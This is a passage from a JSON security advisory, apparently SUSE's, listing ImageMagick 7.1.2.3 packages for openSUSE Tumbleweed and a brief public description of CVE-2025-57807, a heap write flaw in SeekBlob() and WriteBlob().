                "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64",
                  "product_id": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-devel-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "ImageMagick-devel-7.1.2.3-1.1.x86_64",
                  "product_id": "ImageMagick-devel-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64",
                  "product_id": "ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-doc-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "ImageMagick-doc-7.1.2.3-1.1.x86_64",
                  "product_id": "ImageMagick-doc-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-extra-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "ImageMagick-extra-7.1.2.3-1.1.x86_64",
                  "product_id": "ImageMagick-extra-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64",
                  "product_id": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64",
                  "product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-devel-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "libMagick++-devel-7.1.2.3-1.1.x86_64",
                  "product_id": "libMagick++-devel-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-devel-32bit-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "libMagick++-devel-32bit-7.1.2.3-1.1.x86_64",
                  "product_id": "libMagick++-devel-32bit-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
                  "product_id": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
                  "product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
                  "product_id": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
                  "product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "perl-PerlMagick-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "perl-PerlMagick-7.1.2.3-1.1.x86_64",
                  "product_id": "perl-PerlMagick-7.1.2.3-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "ImageMagick-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "ImageMagick-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.s390x"
        },
        "product_reference": "ImageMagick-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "ImageMagick-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x"
        },
        "product_reference": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-devel-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "ImageMagick-devel-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-devel-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "ImageMagick-devel-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-devel-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.s390x"
        },
        "product_reference": "ImageMagick-devel-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-devel-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "ImageMagick-devel-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.s390x"
        },
        "product_reference": "ImageMagick-devel-32bit-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "ImageMagick-devel-32bit-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-doc-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "ImageMagick-doc-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-doc-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "ImageMagick-doc-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-doc-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.s390x"
        },
        "product_reference": "ImageMagick-doc-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-doc-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "ImageMagick-doc-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-extra-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "ImageMagick-extra-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-extra-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "ImageMagick-extra-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-extra-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.s390x"
        },
        "product_reference": "ImageMagick-extra-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ImageMagick-extra-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "ImageMagick-extra-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x"
        },
        "product_reference": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x"
        },
        "product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-devel-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "libMagick++-devel-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-devel-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "libMagick++-devel-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-devel-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.s390x"
        },
        "product_reference": "libMagick++-devel-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-devel-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "libMagick++-devel-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-devel-32bit-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "libMagick++-devel-32bit-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-devel-32bit-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.s390x"
        },
        "product_reference": "libMagick++-devel-32bit-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagick++-devel-32bit-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "libMagick++-devel-32bit-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x"
        },
        "product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x"
        },
        "product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x"
        },
        "product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x"
        },
        "product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perl-PerlMagick-7.1.2.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.aarch64"
        },
        "product_reference": "perl-PerlMagick-7.1.2.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perl-PerlMagick-7.1.2.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.ppc64le"
        },
        "product_reference": "perl-PerlMagick-7.1.2.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perl-PerlMagick-7.1.2.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.s390x"
        },
        "product_reference": "perl-PerlMagick-7.1.2.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perl-PerlMagick-7.1.2.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.3-1.1.x86_64"
        },
        "product_reference": "perl-PerlMagick-7.1.2.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-57807",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-57807"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "ImageMagick is free and open-source software used for editing and manipulating digital images. ImageMagick versions lower than 14.8.2 include  insecure functions: SeekBlob(), which permits advancing the stream offset beyond the current end without increasing capacity, and WriteBlob(), which then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset \u003e\u003e extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2^64 arithmetic wrap, external delegates, or policy settings are required. This is fixed in version 14.8.2.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.aarch64",
          "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ImageMagick-7.1.2.3-1.1.s390x",
